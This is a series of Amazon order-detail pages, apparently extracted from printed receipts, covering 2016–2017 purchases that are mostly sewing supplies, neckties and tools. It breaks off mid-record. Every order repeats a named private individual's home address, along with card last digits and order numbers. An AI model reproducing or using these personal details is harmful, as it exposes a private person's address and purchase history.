Summary. Final Details for Order #116-4467197-2634618 Order Placed: February 3, 2016 Amazon.com order number: 116-4467197-2634618 Order Total: $560.86 Shipped on February 4, 2016 Items Ordered 1 of: Kwik Sew K3883 Shirts Sewing Pattern, Size S-M-L-XL-XXL with Neck Sizes 14 1/2-15 1/2-16 1/2-17 1/2-18 1/2 Sold by: Amazon.com Services LLC Price $10.81 Condition: New 4 of: Swash 80240514 Pods Unwind Cups (12 Pack), Purple Sold by: Amazon.com Services LLC $6.99 Condition: New 1 of: SE MZ101B Helping Hand with Magnifying Glass Sold by: Amazon.com Services LLC $6.56 Condition: New 1 of: McCall's Patterns M4404 Chair Cover Essentials, One Size Only Sold by: Amazon.com Services LLC $10.55 Condition: New 1 of: Dritz 82503 Clothing Care Seam Roll Sold by: Amazon.com Services LLC $14.51 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 4, 2016 Items Ordered 1 of: Dritz Serrated Tracing Wheel Sold by: Amazon.com Services LLC Price $4.39 Condition: New 1 of: Dritz 2-Piece Tailor's Chalk Sold by: Amazon.com Services LLC $3.49 Print this page for your records. Condition: New 1 of: Dritz Machine Needle Inserter and Threader Sold by: Amazon.com Services LLC $5.99 Condition: New 1 of: Dritz Looped Needle Threaders -6 Count Sold by: Amazon.com Services LLC $6.79 Condition: New 1 of: Euro-Notions Ball Point Jersey Machine Needles Sold by: Amazon.com Services LLC $3.37 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 4, 2016 Items Ordered 1 of: SINGER 14T968DC Professional 5 5-4-3-2 Thread Capability Serger Overlock with Auto Tension Sold by: Amazon.com Services LLC Price $354.74 Condition: Used -Very Good Item may come repackaged. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 5, 2016 Items Ordered 1 of: Kwik Sew K3883 Shirts Sewing Pattern, Size S-M-L-XL-XXL with Neck Sizes 14 1/2-15 1/2-16 1/2-17 1/2-18 1/2 Sold by: Amazon.com Services LLC Price $10.81 Condition: New 1 of: Box of 100 Grade 5 Ceramic Magnet 0.472 Inch Diameter 0.197 Inches Thick Dime Sized Fridge Disc for Crafts Ferrite Hobbies Sold by: hydrostorm (seller profile) $10.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 3, 2016 Items Ordered 1 of: Clover Stack 'N Store Bobbin Tower with Nancy Zieman Sold by: Amazon.com Services LLC Price $11.68 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 4, 2016 Items Ordered 1 of: CMS Magnetics® 150 LB Holding Power Neodymium Round Base Magnet w/ Countersunk Hole 1.89" -1 Ct. Sold by: CMS Magnetics, Inc. (seller profile) Price $11.58 Condition: New Brand New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 4, 2016 Items Ordered 1 of: Dritz Longarm Magnetic Pin Bowl-Sold by: Amazon.com Services LLC Price $10.99 Condition: New 2 of: Wonder Clips, Sewing and Beading, Paper Clips, Binder Clips, Multi-purpose Clips, Clips for Sewing, Quilting, Beading, Crocheting, Knitting & General Sold by: Dgasin USA (seller profile) | Product question? Ask Seller $7.99 Condition: New 1 of: 10 Yards of Thread Net for Sewing Embroidery Spools by SMB Always Sold by: Perfect Utopia (seller profile) $12.97 Condition: New 1 of: Invisible Thread 273 Yards-Clear (2) Sold by: cool kraft (seller profile) $9.21 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 4, 2016 Items Ordered 1 of: Janome Buttonhole Stabilizer Plate for Automatic Buttonhole Foot R Sold by: Amazon.com Services LLC Price $14.00 Condition: New 1 of: Dritz 35-Piece Flexi Needle Threaders Sold by: Amazon.com Services LLC $3.49 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Grand Total:$560.86 Payment information Payment Method: Debit Card | Last digits: 0079 Item(s) Subtotal: $560.86 Shipping & Handling: $0.00 Billing address Brian Joseph Coady 1454 Monroe St. NW Total before tax: $560.86 Estimated tax to be collected: $0.00 Washington, DC 20010 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #116-2092696-9227446 Order Placed: February 3, 2016 Amazon.com order number: 116-2092696-9227446 Order Total: $7.98 Shipped on February 4, 2016 Items Ordered 1 of: Teflon Sheet for 16x20 Heat Press Transfer Sheet 5 MIL Sold by: GSSP-GROUP (seller profile) Price $1.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $1.99 Debit Card | Last digits: 0079 Shipping & Handling: $5.99 Billing address Total before tax: $7.98 Brian Joseph Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$7.98 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #116-1144405-2761845 Order Placed: February 3, 2016 Amazon.com order number: 116-1144405-2761845 Order Total: $21.63 Shipped on February 4, 2016 Items Ordered Price 1 of: Neatfold, The Original Bed Sheet & Spread Folder Sold by: MoreStorage (seller profile) $13.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $13.99 Debit Card | Last digits: 0079 Shipping & Handling: $7.64 Billing address Total before tax: $21.63 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$21.63 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-9027115-9672221 Order Placed: January 29, 2016 Amazon.com order number: 112-9027115-9672221 Seller's order number: 1350145 Order Total: $0.00 Shipped on January 30, 2016 Items Ordered Price 1 of: Dritz Pressing Ham Sold by: Fabric com (seller profile) $9.58 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $9.58 MasterCard | Last digits: 5262 Shipping & Handling: $0.00 Gift Card Total before tax: $9.58Billing address Estimated tax to be collected: $0.00Brian Joseph Coady Gift Card Amount:-$9.58 1454 Monroe St. NW Washington, DC 20010 Grand Total: $0.00 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-8603848-7495461 Order Placed: January 29, 2016 Amazon.com order number: 112-8603848-7495461 Order Total: $0.00 Shipped on January 30, 2016 Items Ordered 1 of: THREAD SPOOL HUGGERS, 'PEELS ...Keep Thread Tails Under Control' (12 Pieces). Prevents Thread Spools From Unwinding While in Storage or on Thread Rack Sold by: Smartneedle.inc (seller profile) Price $9.99 Condition: New 1 of: UCEC U Sewing Scissors -Variety Color -Great for Stitch,DIY Supplies -Pack of 12 Sold by: BuyInOneBox (seller profile) $9.99 Condition: New 1 of: Dritz Machine Needle Inserter and Threader Sold by: Amazon.com Services LLC $5.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 31, 2016 Items Ordered 1 of: 5-pc 2.75"measure Clip Hemmer No Pin Hem Clip w/ Marking Ruler Guides Sold by: Estore Ship From China (seller profile) Price $5.99 Condition: New 1 of: Fleece Windproof Ski Face Mask Balaclavas Hood by Super Z Outlet (Black) Sold by: Super Z Outlet (seller profile) $10.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Print this page for your records. WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 31, 2016 Items Ordered 1 of: CMS Magnetics® 150 LB Holding Power Neodymium Round Base Magnet w/ Countersunk Hole 1.89" -1 Ct. Sold by: CMS Magnetics, Inc. (seller profile) Price $11.58 Condition: New Brand New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 30, 2016 Items Ordered 1 of: Dritz 35-Piece Flexi Needle Threaders Sold by: Amazon.com Services LLC Price $3.49 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $58.02 MasterCard | Last digits: 5262 Shipping & Handling: $0.00 Gift Card Billing address Total before tax: $58.02 Brian Joseph Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Gift Card Amount:-$58.02 Washington, DC 20010 ---- United States Grand Total: $0.00 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #112-5850971-5695456 Order Placed: January 29, 2016 Amazon.com order number: 112-5850971-5695456 Order Total: $0.00 Shipped on January 30, 2016 Items Ordered Price 1 of: Liquid Bearings with extra long 3" needle tip, The TOP QUALITY 100%-synthetic $8.99 oil for sewing machines and sergers, makes them quieter and smoother, el Sold by: Liquid Bearings Store (seller profile) Condition: New Brand new 1 oz bottles, Anytime money-back guarantee, SHIPS NEXT DAY! Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $8.99 MasterCard | Last digits: 5262 Shipping & Handling: $2.99 Gift Card Total before tax: $11.98Billing address Estimated tax to be collected: $0.00Brian Joseph Coady Gift Card Amount:-$11.98 1454 Monroe St. NW Washington, DC 20010 Grand Total: $0.00United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-0245241-4357860 Order Placed: January 29, 2016 Amazon.com order number: 112-0245241-4357860 Order Total: $0.00 Shipped on January 30, 2016 Items Ordered Price 1 of: Eyeglasses Jeweler 20X Magnifier Magnifying Glass Loupe LED Light Watch Repair $5.99 By Kurtzy TM Sold by: Kurtzie -USA (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $5.99 MasterCard | Last digits: 5262 Shipping & Handling: $4.99 Gift Card Total before tax: $10.98Billing address Estimated tax to be collected: $0.00Brian Joseph Coady Gift Card Amount:-$10.98 1454 Monroe St. NW Washington, DC 20010 Grand Total: $0.00United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-5483466-1252262 Order Placed: January 29, 2016 Amazon.com order number: 112-5483466-1252262 Order Total: $0.00 Shipped on January 29, 2016 Items Ordered Price 1 of: 100x Silver Tone Wire Loop DIY Needle Threader Stitch Insertion Hand Machine Sewing Tool Sold by: YONGER CO.,LIMITED (seller profile) $2.28 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $2.28 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Gift Card Total before tax: $2.28Billing address Estimated tax to be collected: $0.00Brian Joseph Coady Gift Card Amount:-$2.28 1454 Monroe St. NW Washington, DC 20010 Grand Total: $0.00 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-5063781-1539454 Order Placed: January 29, 2016 Amazon.com order number: 112-5063781-1539454 Order Total: $0.00 Shipped on January 29, 2016 Items Ordered Price 1 of: 5 Pieces/lot New Clippers Sewing Trimming Scissors Nipper Embroidery Thrum Yarn Fishing Thread Beading Cutter Sold by: Masingo(from HK) (seller profile) $2.40 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $2.40 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Gift Card Total before tax: $2.40Billing address Estimated tax to be collected: $0.00Brian Joseph Coady Gift Card Amount:-$2.40 1454 Monroe St. NW Washington, DC 20010 Grand Total: $0.00 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #103-3226358-8069868 Order Placed: January 24, 2016 Amazon.com order number: 103-3226358-8069868 Order Total: $2.98 Shipped on January 24, 2016 Items Ordered Price 1 of: KurtzyTM Pair of Stainless Steel Dressmaking Tailoring Scissors Shears For Fabric $12.99 Sewing Crafts Sold by: Kurtzie -USA (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $12.99 Debit Card | Last digits: 0079 Shipping & Handling: $4.99 Gift Card Total before tax: $17.98Billing address Estimated tax to be collected: $0.00Brian Joseph Coady Gift Card Amount:-$15.00 1454 Monroe St. NW Washington, DC 20010 Grand Total: $2.98United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-9819825-8384229 Order Placed: January 15, 2016 Amazon.com order number: 115-9819825-8384229 Order Total: $114.66 Shipped on January 15, 2016 Items Ordered 1 of: Euro-Notions Universal Machine Needles, 10-Pack Sold by: Amazon.com Services LLC Price $5.99 Condition: New 1 of: Singer Titanium Universal Reg and Ball Point Machine Needles Combo Pack, 8Pack Sold by: Amazon.com Services LLC $7.29 Condition: New 2 of: Woolly Nylon Thread Solids 1000 Meters-Black Sold by: Amazon.com Services LLC $6.63 Condition: New 1 of: Euro-Notions Twin Machine Needle, Size 1.6/70 (1), 2.0/80 (1), 3.0/90 (1) Sold by: Amazon.com Services LLC $8.99 Condition: New 1 of: Singer 21495 Transparent Plastic Class 15 Threaded Bobbin, 12-Pack Sold by: Amazon.com Services LLC $5.64 Condition: New 1 of: Janome Hemming Guide for CoverPro Models Sold by: Amazon.com Services LLC $19.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 15, 2016 Items Ordered 1 of: Euro-Notions Twin Stretch Machine Needle, 4/75-Inch Sold by: Amazon.com Services LLC Price $10.34 Print this page for your records. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 16, 2016 Items Ordered Price 1 of: Dritz Styling Design Ruler $14.23 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 15, 2016 Items Ordered Price 1 of: Fiskars Rotary Cutting Set $28.93 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Debit Card | Last digits: 0079 Billing address Brian Joseph Coady 1454 Monroe St. NW Washington, DC 20010 United States Item(s) Subtotal: $114.66 Shipping & Handling: $0.00 Total before tax: $114.66 Estimated tax to be collected: $0.00 Grand Total:$114.66 Final Details for Order #115-8685129-9659404 Order Placed: January 15, 2016 Amazon.com order number: 115-8685129-9659404 Order Total: $12.22 Shipped on January 18, 2016 Items Ordered Price 2 of: Wooly Nylon Thread -1000m Spools -Color 9175 -50 Colors Available -by Threadart Sold by: Threadart (seller profile) $3.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $7.98 Debit Card | Last digits: 0079 Shipping & Handling: $4.24 Billing address Total before tax: $12.22Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$12.22 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-8634807-2541051 Order Placed: January 15, 2016 Amazon.com order number: 115-8634807-2541051 Order Total: $4.95 Shipped on January 16, 2016 Items Ordered Price 1 of: Piping Cord 4/32" (3.175mm) Clothes Line 66% Cotton 34% Polyester (5 Yard Cut) Sold by: Tiger Textiles (seller profile) $1.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $1.99 Debit Card | Last digits: 0079 Shipping & Handling: $2.96 Billing address Total before tax: $4.95Brian Joseph Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$4.95 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-8479799-9073824 Order Placed: January 15, 2016 Amazon.com order number: 115-8479799-9073824 Order Total: $77.82 Shipped on January 15, 2016 Items Ordered Price 1 of: Lifetime 4428 Height Adjustable Folding Utility Table, 48 by 24 Inches, White Granite Sold by: Amazon.com Services LLC $38.91 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Shipped on January 15, 2016 Items Ordered Price 1 of: Lifetime 4428 Height Adjustable Folding Utility Table, 48 by 24 Inches, White $38.91 Granite Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $77.82 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 ---- Billing address Total before tax: $77.82 Brian Joseph Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW ---- Washington, DC 20010 Grand Total:$77.82 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #115-9905855-8245802 Order Placed: January 15, 2016 Amazon.com order number: 115-9905855-8245802 Order Total: $4.35 Shipped on January 16, 2016 Items Ordered Price 1 of: Soophen Poly Men's Soild Color Necktie -White Sold by: Vigvog (seller profile) $4.35 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $4.35 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $4.35 Brian Joseph Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$4.35 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-7589693-6637867 Order Placed: January 15, 2016 Amazon.com order number: 115-7589693-6637867 Order Total: $231.59 Shipped on January 15, 2016 Items Ordered Price 1 of: Heavy Duty Blind Stitch Sewing Machine, Portable By New-tech (110 Volt) Ships $226.00 From Usa Sold by: GoldStar Tool (seller profile) Condition: New brand new ships from los angeles california Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $226.00 Debit Card | Last digits: 0079 Shipping & Handling: $5.59 Billing address Total before tax: $231.59Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$231.59 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-2943524-9945810 Order Placed: January 15, 2016 Amazon.com order number: 115-2943524-9945810 Order Total: $6.97 Shipped on January 15, 2016 Items Ordered Price 1 of: Poly Multi Solid Color Tie, Periwinkle Sold by: Boxed-Gifts (seller profile) $1.99 Condition: New Ships from NJ, USA. 1-3 Day Expedited Shipping also available. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $1.99 Debit Card | Last digits: 0079 Shipping & Handling: $4.98 Billing address Total before tax: $6.97 Brian Joseph Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$6.97 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-2776460-0214649 Order Placed: January 15, 2016 Amazon.com order number: 115-2776460-0214649 Order Total: $4.50 Shipped on January 15, 2016 Items Ordered Price 1 of: Poly Multi Solid Color Tie, Taupe Sold by: Tieguys (seller profile) $1.75 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $1.75 Debit Card | Last digits: 0079 Shipping & Handling: $2.75 Billing address Total before tax: $4.50 Brian Joseph Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$4.50 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-1856138-5383438 Order Placed: January 15, 2016 Amazon.com order number: 115-1856138-5383438 Order Total: $15.96 Shipped on January 18, 2016 Items Ordered Price 1 of: HDE Mens Vintage Casual Solid and Pattern Waffle Knit Woven Square End Neck Tie (Brown) Sold by: HDE (seller profile) $4.99 Condition: New 1 of: HDE Mens Vintage Casual Solid and Pattern Waffle Knit Woven Square End Neck Tie (Shades of Blue) Sold by: HDE (seller profile) $4.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $9.98 Debit Card | Last digits: 0079 Shipping & Handling: $5.98 Billing address Total before tax: $15.96 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$15.96 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-1297364-5577051 Order Placed: January 15, 2016 Amazon.com order number: 115-1297364-5577051 Order Total: $4.50 Shipped on January 17, 2016 Items Ordered Price 1 of: New Polyester Men's Neckties Solid Neck Tie 38 Colors (Fire Red) Sold by: Soophen Online Shop (seller profile) $4.50 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $4.50 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $4.50 Brian Joseph Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$4.50 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-9471989-1272266 Order Placed: January 4, 2016 Amazon.com order number: 115-9471989-1272266 Order Total: $2.34 Shipped on January 4, 2016 Items Ordered Price 1 of: 20 Pk Singer Class 15 # 2518 Metal Bobbins Sold by: CZ-T (seller profile) $2.34 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $2.34 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $2.34 Brian Joseph Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$2.34 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9872820-4401037 Order Placed: December 30, 2017 Amazon.com order number: 111-9872820-4401037 Order Total: $23.68 Shipped on January 2, 2018 Items Ordered Price 1 of: Loggerhead Tools BW6-01R-01 Adjustable 6-Inch Bionic Wrench Sold by: MaxWarehouse (seller profile) $23.68 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $23.68 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $23.68 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$23.68 United States Credit Card transactions AmazonPLCC ending in 3157: January 2, 2018:$23.68 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7983942-1809022 Order Placed: December 30, 2017 Amazon.com order number: 111-7983942-1809022 Order Total: $6.57 Shipped on December 31, 2017 Items Ordered Price 1 of: 4 Year Asurion Home Improvement Extended Protection Plan ($75-99.99) Sold by: Asurion, LLC (seller profile) $6.21 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Shipping Payment information Payment Method: Item(s) Subtotal: $6.21 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $6.21 BRIAN J COADY Estimated tax to be collected: $0.36 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$6.57 United States Credit Card transactions AmazonPLCC ending in 3157: December 31, 2017:$6.57 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6480020-8005821 Order Placed: December 30, 2017 Amazon.com order number: 111-6480020-8005821 Order Total: $99.00 Shipped on December 31, 2017 Items Ordered Price 1 of: Factory-Reconditioned Bosch 11255VSR-RT BULLDOG Xtreme 1-Inch SDS-plus D-Handle Rotary Hammer (Certified Refurbished) Sold by: CPO Outlets (seller profile) $99.00 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $99.00 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $99.00BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$99.00 United States Credit Card transactions AmazonPLCC ending in 3157: December 31, 2017:$99.00 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3050787-0363456 Order Placed: December 30, 2017 Amazon.com order number: 111-3050787-0363456 Order Total: $25.99 Shipped on January 1, 2018 Items Ordered 1 of: The Slate Roof Bible, Jenkins, Joseph Sold by: afstructure85 (seller profile) Price $25.99 Condition: Used -Very Good **Ships from Arizona with tracking number provided** Names on first page. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $25.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $25.99 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$25.99 United States Credit Card transactions AmazonPLCC ending in 3157: January 1, 2018:$25.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2141353-3656211 Order Placed: December 30, 2017 Amazon.com order number: 111-2141353-3656211 Order Total: $63.61 Shipped on January 2, 2018 Items Ordered Price 1 of: uxcell Door Bottom Sweep Brown Aluminum Alloy w 2-inch Black PP Silicone Soft $23.73 Brush 39-inch x 2.4-inch Sold by: uxcell (seller profile) | Product question? Ask Seller Condition: New 1 of: Bosch HC2104 5/8 In. x 12 In. SDS-plus Bulldog Rotary Hammer Bit $18.81 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 1, 2018 Items Ordered Price 1 of: One Way Mirror Film Window Tint Glass Screen Home Interiors Privacy Screen $19.99 Decorative Heat Control Residential Window Film, Black-Silver(23.6"x78.7") Sold by: HIDBEA (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $62.53 Shipping & Handling: $0.00 ---- Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $62.53 Estimated tax to be collected: $1.08 ---- WASHINGTON, DC 20010 Grand Total:$63.61 United States Credit Card transactions AmazonPLCC ending in 3157: January 2, 2018:$43.62 AmazonPLCC ending in 3157: January 1, 2018:$19.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7995801-5381007 Order Placed: December 19, 2017 Amazon.com order number: 111-7995801-5381007 Seller's order number: 221192 Order Total: $9.99 Shipped on December 21, 2017 Items Ordered Price 1 of: Tiptiper Claw Magnetic Pick-up Tool, Blue LED Lighted Steel Claw Mechanical Pick-$9.99 Up Tool & Retriever Sold by: BlingZoo (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $9.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $9.99 BRIAN J COADY Estimated tax to be collected: 